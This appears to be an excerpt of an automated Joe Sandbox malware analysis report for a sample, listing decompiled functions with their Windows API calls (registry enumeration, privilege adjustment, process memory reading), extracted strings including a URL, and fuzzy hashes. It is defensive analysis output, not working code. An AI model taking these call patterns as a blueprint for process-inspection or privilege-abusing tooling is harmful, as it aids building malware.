                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$AllocHeap_malloc_sprintf
                                                                                  • String ID: 1
                                                                                  • API String ID: 1264483833-2212294583
                                                                                  • Opcode ID: fa6c40de08958da53836c54e91e810a0b6cf40ede71b81ab1140619728ff5e3d
                                                                                  • Instruction ID: 13b254575551bd18ea8aa8082fc147589146296ef68c32a87f3e782b2e8c0e4a
                                                                                  • Opcode Fuzzy Hash: fa6c40de08958da53836c54e91e810a0b6cf40ede71b81ab1140619728ff5e3d
                                                                                  • Instruction Fuzzy Hash: 053124B11083856FD311DB64C8ACEEB77E9DFC6348F054929E5C48B116EF609A0CC3A2
                                                                                  Function 6A6F0BA0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog3_GS.LIBCMT ref: 6A6F0BAA
                                                                                  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 6A6F0C90
                                                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 6A6F0CAD
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 6A6F0CCD
                                                                                  • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 6A6F0CE8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseEnumH_prolog3_OpenQueryValue
                                                                                  • String ID: Software\
                                                                                  • API String ID: 1666054129-964853688
                                                                                  • Opcode ID: 18ab82d6f335443fa397432e7eee69f722078a14932cbf8a856986b48c3fb508
                                                                                  • Instruction ID: e465461d35be25b85b039492e955447621380aab0868eb0d3797ddbcf298766e
                                                                                  • Opcode Fuzzy Hash: 18ab82d6f335443fa397432e7eee69f722078a14932cbf8a856986b48c3fb508
                                                                                  • Instruction Fuzzy Hash: 7241BF71900228ABCB21DB64CC48ADEB3FAEF4A314F1649D9E145E2151EF309F96CF54
                                                                                  Function 6A6D7740 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6D776E
                                                                                    • Part of subcall function 6A6DB0A0: _memset.LIBCMT ref: 6A6DB0C8
                                                                                  • _memset.LIBCMT ref: 6A6D77AC
                                                                                  • _memset.LIBCMT ref: 6A6D77C3
                                                                                  • _memset.LIBCMT ref: 6A6D77E0
                                                                                    • Part of subcall function 6A6D5160: LoadLibraryA.KERNEL32(version.dll,?,?,00000000), ref: 6A6D519C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$LibraryLoad
                                                                                  • String ID: LanderScr$http://www.LongZuYQ.com
                                                                                  • API String ID: 1275148839-1063765635
                                                                                  • Opcode ID: 1395bd7b622b1e46511b71f90ce932a685495b69cc145bca2a2cf6e0e4ce6a20
                                                                                  • Instruction ID: 213a5be9f63bab23ddb17d4120257808adeaf3ce906dcbbb93a086e5f0cc76d3
                                                                                  • Opcode Fuzzy Hash: 1395bd7b622b1e46511b71f90ce932a685495b69cc145bca2a2cf6e0e4ce6a20
                                                                                  • Instruction Fuzzy Hash: 8031F5B16083406AD320E760D999FDB77ED9BD4348F44482CE999C7252FE70960CC6E7
                                                                                  Function 6A6E0B70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 94COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6E0B97
                                                                                  • _memset.LIBCMT ref: 6A6E0BAE
                                                                                    • Part of subcall function 6A6E0470: GetModuleHandleA.KERNEL32 ref: 6A6E052A
                                                                                    • Part of subcall function 6A6E0470: GetProcAddress.KERNEL32(00000000), ref: 6A6E0531
                                                                                  • OutputDebugStringA.KERNEL32(6A7233DC,?,?,?,?,?,00000015,00000000), ref: 6A6E0BD0
                                                                                  • _memset.LIBCMT ref: 6A6E0C61
                                                                                  • _sprintf.LIBCMT ref: 6A6E0C81
                                                                                  Strings
                                                                                  • file path: %s, md5 :%s, match val : %d, xrefs: 6A6E0C7B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$AddressDebugHandleModuleOutputProcString_sprintf
                                                                                  • String ID: file path: %s, md5 :%s, match val : %d
                                                                                  • API String ID: 723078608-2925406424
                                                                                  • Opcode ID: c9344bc49ede084e9b808f921877528e5b07271e638e3e53509352d763e52b98
                                                                                  • Instruction ID: d5c06e6decf5f1d2a83f8d3cfabec2d4abb8f0278223232b1ddd6b98c98c9c53
                                                                                  • Opcode Fuzzy Hash: c9344bc49ede084e9b808f921877528e5b07271e638e3e53509352d763e52b98
                                                                                  • Instruction Fuzzy Hash: 8B210EB29482406BD320D754EC85FAB77E9AF90759F46083DF54993142EE30D90C8BA3
                                                                                  Function 6A6F007E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 94windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetMenuCheckMarkDimensions.USER32 ref: 6A6F0096
                                                                                  • _memset.LIBCMT ref: 6A6F010E
                                                                                  • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 6A6F0171
                                                                                  • LoadBitmapA.USER32(00000000,00007FE3), ref: 6A6F0189
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                                                                                  • String ID: $4}qj
                                                                                  • API String ID: 4271682439-973896021
                                                                                  • Opcode ID: 163551dadd80e396eee97badc4513f6f2a4da219993e23a835b6c3f4ffba075a
                                                                                  • Instruction ID: c0839fa049ba12d5925f4cb7a343e7f6e9412bf7abb7431c58bc87199139fd7b
                                                                                  • Opcode Fuzzy Hash: 163551dadd80e396eee97badc4513f6f2a4da219993e23a835b6c3f4ffba075a
                                                                                  • Instruction Fuzzy Hash: 82313571A002199BEB20CF64CC88BA97BF6FB49304F4644B6E549EB281DF308D458F50
                                                                                  Function 6A6F0A22 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog3_catch_GS.LIBCMT ref: 6A6F0A2C
                                                                                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 6A6F0ABA
                                                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 6A6F0ADD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnumH_prolog3_catch_Open
                                                                                  • String ID: Software\Classes\
                                                                                  • API String ID: 689246474-1121929649
                                                                                  • Opcode ID: 3482b3a452f67560d0662c0eff39b06b4c6744a2cbcb4875c96a2e62a002737e
                                                                                  • Instruction ID: 7e66b34280b34af0b720d472820a5533745300dd80a0c17a7a88eca33a5f75f5
                                                                                  • Opcode Fuzzy Hash: 3482b3a452f67560d0662c0eff39b06b4c6744a2cbcb4875c96a2e62a002737e
                                                                                  • Instruction Fuzzy Hash: E631BE72C001289BCB22DBA4CC48BDDB7F5AF09314F0602D5E999A3292EF305F959F91
                                                                                  Function 0BEEF628 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83filesynchronizationCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • UnmapViewOfFile.KERNEL32(00000000,00000000,0BEEF74D), ref: 0BEEF6CC
                                                                                  • CloseHandle.KERNEL32(00000000,00000000,0BEEF74D), ref: 0BEEF6EC
                                                                                  • ReleaseMutex.KERNEL32(?,00000000,0BEEF74D), ref: 0BEEF713
                                                                                  • CloseHandle.KERNEL32(?,?,00000000,0BEEF74D), ref: 0BEEF71E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandle$FileMutexReleaseUnmapView
                                                                                  • String ID: eno192$eno198
                                                                                  • API String ID: 809188715-4178521652
                                                                                  • Opcode ID: fd59739767e25ffe5bd97fde50b36ab5002fda3d133cc5f7cf1d10bc67647d4c
                                                                                  • Instruction ID: baca87fd2aa88f5df69b1fc6dde5b6819af1ec1a8dafee7101d01a5a6b24bef1
                                                                                  • Opcode Fuzzy Hash: fd59739767e25ffe5bd97fde50b36ab5002fda3d133cc5f7cf1d10bc67647d4c
                                                                                  • Instruction Fuzzy Hash: 72312A706212069FEB11EF6AE492A0A77F6EF88244F51B161E424CB7A0D734ED45CBE0
                                                                                  Function 6A6D8AD0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 75COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 6A6DD8E0: RtlAdjustPrivilege.NTDLL ref: 6A6DD90C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD94C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD96F
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD997
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9B0
                                                                                    • Part of subcall function 6A6DD8E0: ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9C7
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9F0
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DDA03
                                                                                  • _memset.LIBCMT ref: 6A6D8B1F
                                                                                  • ReadProcessMemory.KERNEL32 ref: 6A6D8B83
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6A6D8BAB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Memory$ProcessVirtual$AllocateInformationOpenQuerySystem$AdjustCloseFreeHandlePrivilegeRead_memset
                                                                                  • String ID: c$m$o
                                                                                  • API String ID: 3693474235-1527384053
                                                                                  • Opcode ID: b66db8c1ba3223f2a51d441fa8c802093db5179209641cb697d7eeb4d318c65f
                                                                                  • Instruction ID: dd851ed8d2d1d6675ddb62b48b93879c8347671c22b1eca46f3d165bbb3c0f18
                                                                                  • Opcode Fuzzy Hash: b66db8c1ba3223f2a51d441fa8c802093db5179209641cb697d7eeb4d318c65f
                                                                                  • Instruction Fuzzy Hash: 6921A27250D3C09EC311DFA8888499BBFE45FA9248F080A6DF1D497242D664C70CCBB7
                                                                                  Function 0BE91CE4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RtlEnterCriticalSection.NTDLL(0BEFB5CC), ref: 0BE91D13
                                                                                  • LocalFree.KERNEL32(00000000,00000000,7'), ref: 0BE91D25
                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000000,7'), ref: 0BE91D49
                                                                                  • LocalFree.KERNEL32(00000000,00000000,00000000,7'), ref: 0BE91D9A
                                                                                  • RtlLeaveCriticalSection.NTDLL(0BEFB5CC), ref: 0BE91DC8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Free$CriticalLocalSection$EnterLeaveVirtual
                                                                                  • String ID: 7'
                                                                                  • API String ID: 4212268253-3510403523
                                                                                  • Opcode ID: 93d954a5d932d4381d95fc8167ed5fdc76b3d7b18d8e79c905f5607d29579f79
                                                                                  • Instruction ID: ad6bead514783837abe81b76b91ae8b9e8a47a0e52f107d5ed2fcf5c02dfdf21
                                                                                  • Opcode Fuzzy Hash: 93d954a5d932d4381d95fc8167ed5fdc76b3d7b18d8e79c905f5607d29579f79
